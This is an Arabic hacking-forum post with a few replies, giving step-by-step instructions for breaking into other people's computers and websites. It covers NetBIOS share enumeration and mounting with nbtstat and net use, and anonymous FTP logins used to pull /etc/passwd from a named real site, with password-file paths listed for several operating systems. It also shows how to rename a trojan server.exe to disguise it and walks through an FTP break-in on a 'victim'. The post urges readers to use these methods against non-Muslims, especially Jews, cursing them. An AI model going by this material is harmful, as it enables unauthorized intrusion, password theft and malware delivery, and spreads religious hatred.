أخطر أوامر في الدوس

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.

وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .

1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).



2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .



3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .



4- سيظهر لك الجدول التالى :

NetBIOS Remote Machine Name Table

____________________________________

Name Type Status

-------------------------------------------

J-1 <00> UNIQUE Registered

WORK <00> GROUP Registered

J-1 <03> UNIQUE Registered

J-1 <20> UNIQUE Registered

WORK <1E> GROUP Registered

WORK <1D> UNIQUE Registered

__MSBROWSE__.<01>GROUP Registered

ملحوظة : تم حذف المعلومات الأصلية من الجدول .



5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.



6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:

Net view \\



7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :

Shared resources at \\ip_address

Sharename Type Comment

MY ********S Disk

TEMP Disk



8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :

Net use x: \\\temp



طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع



User name-Password



وهما يكونان محفوظين في ملف يسمي



PASSWD غالبا



بعض المواقع تضع هذا الملف في الإف تي بي



ما هو إف تي بي؟



FTP=File Transfer Protocol بروتوكول نقل الملفات



تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت



start==>run إبدأ ثم تشغيل



واكتب telnet



سيفتح التلنت اضغط علىRemote System ==> connect



ثم اكتب الموقع في Host Name مثلا



kahane.org أو الآيبي الخاص به



وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي



ثم اضغط connect



وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code



user anonymous



ثم انتر بعدها يطلب السيرفر كلمة السر اكتب



pass zzzoozz@yahoo.com



اكتب أي بريد ككلمة سر وطبعا سيكون وهميا



ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..



بعدها سنحصل على ملف الباسوورد



قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل



cute ftp - ws_ftp



مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان



ftp.kahane.org



لتحصل على الملف في التلنت اكتب



retr /etc/passwd



/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع



Sunos 5.0 etc/shadow او etc/passwd

Linux etc/shadow او etc/passwd

BSD4.3 –RENO etc/master.passwd

AIX etc/security/passwd

NT ويندوز scripts/passwd



وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

طريقة تغيير امتداد exe عن طريق الدوس جديد



اتبع الخطوات التالية:-

إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.



وهذي ارامر النت ستات مرة ثانية

مايتطسع فعله netstat



==============================================



NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة

NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها

NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام

NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة

NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك

NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك

NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة



هذا اوامر للدخول الى جهاز الضحية:

FTP

أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت

21

مفتوح و هو البورت الخاص بــ

FTP

و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها

Superscanne

بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي

إضغط على

Start

ثم

Run

ثم اكتب

ftp –n

تطلع لك نافدة في الدوس مكتوب عليها

FTP&g

لحد هنا كل شيء تمام

و بعدين اكتب

Open

ثم إضغط على

إدخال

Enter

تتحصل عب النتيجة التالية

FTP&g

To

أكتب جنب

To

رقم IP الضحية ثم إضغط على إدخال

و الحين اهم جزء



إدا تحصلت على هذا الرد فقد تخطيت خطوة

Connected to www.assassin.com

220 websrv1 Microsoft FTP Service (Version 4.0).

و الآن أكتب الكتابة التالية

ftp&gquote user ftp

إدا تحصلت على هذا الرد فقد تخطيت خطوة

331 Anonymous acces allowed, send identify (e-mail name) as password.

و الآن أكتب الكتابة التالية

ftp&gquote cwd ~root

إدا تحصلت على هذا الرد فقد تخطيت خطوة

530 Please login with USER and PASS

ثم أكتب الكتابة التالية

ftp&gquote pass ftp

إدا تحصلت على هذا الرد فقد تخطيت خطوة

و نجحت في الإقتحام يعني الاختراق



230 Anonymous user logged in.

مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه

ما عليك الآن الا ان تقوم بإستعمال

اوامر الفتيبي

و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا

قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق



Pwd

لكي تعر ما يحتويه الهارد ديسك

Cd

لإقتحام مجلد مثال

Cd black

في هدا المثال قمت بإقتحام مجلد المسمى بلاك

Ls

لكي يتضح لك محتوى المجلد أو الهارد ديسك

Get

لكي تحمل الى سطح المكتب بتاع جهازك

مثال

Get black.exe

Put

العملية الع**ية ل

Get

يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في

في جهاز الضحية

مثال

Put black.exe

Clos

لقطع الإتصال مع الضحية





هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها

Codes: Signification:

110 Restart marker reply.

120 Service ready in nnn minutes. (nnn est un temps)

125 Data connection already open; transfer starting.

150 File status oka about to open data connection.

200 Command okay.

202 Command not implemented, superfluous at this site.

211 System status, or system help reply.

212 Directory status.

213 File status.

214 Help message.

215 NAME system type.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection.

227 Entering passive mode (h1, h2, h3, h4, p1, p2).

230 User logged in, proceed.

250 Requested file action okay, completed.

257 \"PATHNAME\" created.

331 User name okay, need password.

332 Need account for login.

350 Requested file action pendingfurther information.

421 Service not available, closing control connection.

425 Can\'t open data connection.

426 Connection closed; transfer aborded.

450 Requested file action not taken. (Fichier déjà utilisé par autre chose)

451 Requested action aborded: local error processing.

452 Requested action not taken. (Pas assez de mémoire pour exécuter l\'action)

500 Syntax error, command unrecognized.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken. (Fichier non trouvé, pas d\'accès possible,...)

551 Requested action aborded: page type unknown.

552 Requested file action aborded.

553 Requested action not taken. (Nom de fichier non attribué)

إنتظروا مشاركاتي بعد إمتحانات البكلوريا

أشكرك الأخت

مشكوووووور اخي على هذا الدرس نحن في انتضار جديدك

يا جماعة الخير السلام عليكم لمن اراد اي شيء أنا يتصل بي على السكايب نتاعي koulah1

وعليكم السلام اوك اخي